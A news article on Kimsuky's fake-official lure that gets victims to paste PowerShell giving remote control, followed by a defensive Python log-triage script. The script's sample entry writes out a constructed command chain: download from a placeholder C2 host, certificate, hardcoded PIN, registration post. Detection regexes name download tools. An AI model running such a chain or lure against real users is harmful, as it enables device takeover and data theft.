
North Korean Hackers Use PowerShell to Trick Victims and Gain Control of Devices in New Cyberattack

A hacking group linked to North Korea, called Kimsuky, has been using a new trick to fool people into running harmful commands on their computers. 

They pretend to be South Korean government officials and build trust with their targets over time. Then, they send a fake email with a PDF attachment. 

When the victim tries to open the PDF, they are told to click a registration link for their Windows system. The link instructs them to: 

  1. Open PowerShell as an administrator.

  2. Copy and paste the given code into the terminal.

  3. Run the code, without knowing it is harmful.

This method allows the hackers to take control of the victim’s computer. 

The Microsoft Threat Intelligence team warned about this attack in a series of posts on X (formerly Twitter). 

"Should the victim follow through, the malicious code downloads and installs a browser-based remote desktop tool, along with a certificate file with a hardcoded PIN from a remote server.

The code then sends a web request to a remote server to register the victim device using the downloaded certificate and PIN. This allows the threat actor to access the device and carry out data exfiltration," Microsoft said.

The tech giant said it observed the use of this approach in limited attacks since January 2025, describing it as a departure from the threat actor's usual tradecraft. 

It's worth noting that Kimsuky is not the only North Korean hacking crew to adopt this compromise strategy. In December 2024, it was revealed that threat actors linked to the Contagious Interview campaign were tricking users into copying and executing a malicious command on their Apple macOS systems via the Terminal app, supposedly to fix a problem with accessing the camera and microphone through the web browser.

These types of attacks, including those using the ClickFix method, have become much more common in recent months. A key reason for their success is that they trick victims into infecting their own computers, allowing hackers to bypass security protections. 
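As an added illustration for defenders (this is not code from the article or from Microsoft's posts), the following Python script scores PowerShell script-block log entries against the chain described above: an elevated session that downloads a file, references a certificate file and a hardcoded PIN, and then posts a registration request to a remote server. The sample events, hostnames, commands and indicator patterns are all constructed assumptions for demonstration, not real Kimsuky artifacts.

```python
import re

# Constructed sample script-block log entries (hypothetical, not real attacker
# commands). Each record carries the user, whether PowerShell ran elevated,
# and the logged script text.
SAMPLE_EVENTS = [
    {"user": "alice", "elevated": True,
     "script": "Invoke-WebRequest -Uri 'https://placeholder-c2.invalid/rd.zip' -OutFile $env:TEMP\\rd.zip; "
               "Invoke-WebRequest -Uri 'https://placeholder-c2.invalid/device.pem' -OutFile $env:TEMP\\device.pem; "
               "$pin='123456'; Invoke-RestMethod -Method Post -Uri 'https://placeholder-c2.invalid/register' "
               "-Body @{cert=$cert;pin=$pin}"},
    {"user": "bob", "elevated": False,
     "script": "Get-ChildItem C:\\Users\\bob\\Documents | Sort-Object Length"},
    {"user": "carol", "elevated": True,
     "script": "Invoke-WebRequest -Uri 'https://internal.example/update.msi' -OutFile C:\\Temp\\update.msi"},
]

# Heuristic indicators for the stages the article describes (assumed patterns).
INDICATORS = {
    "download": re.compile(r"(Invoke-WebRequest|iwr|Start-BitsTransfer|DownloadFile|DownloadString|curl)\b", re.I),
    "certificate": re.compile(r"\.(pem|pfx|crt)\b|certificate", re.I),
    "hardcoded_pin": re.compile(r"\bpin\s*=\s*['\"]?\d{4,}", re.I),
    "registration": re.compile(r"(Invoke-RestMethod|-Method\s+Post).*\b(register|enrol)", re.I),
}

# Every stage must be present for the full-chain verdict.
FULL_CHAIN = {"download", "certificate", "hardcoded_pin", "registration"}


def score_event(event):
    """Return the list of indicator names that fire for one log entry."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["script"])]
    if event["elevated"]:
        hits.append("elevated")
    return hits


def classify(event):
    """Map an entry to 'alert' (full chain, elevated), 'review' or 'benign'."""
    hits = set(score_event(event))
    if FULL_CHAIN <= hits and "elevated" in hits:
        return "alert"
    if {"download", "elevated"} <= hits:
        return "review"
    return "benign"


def triage(events):
    """Summarise verdicts per user so an analyst can prioritise follow-up."""
    return {e["user"]: classify(e) for e in events}


if __name__ == "__main__":
    for user, verdict in triage(SAMPLE_EVENTS).items():
        print(f"{user}: {verdict}")
```

An elevated download of an installer on its own only lands in the review bucket; the alert requires the certificate, PIN and registration stages to appear together, which is what distinguishes this chain from routine administration.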
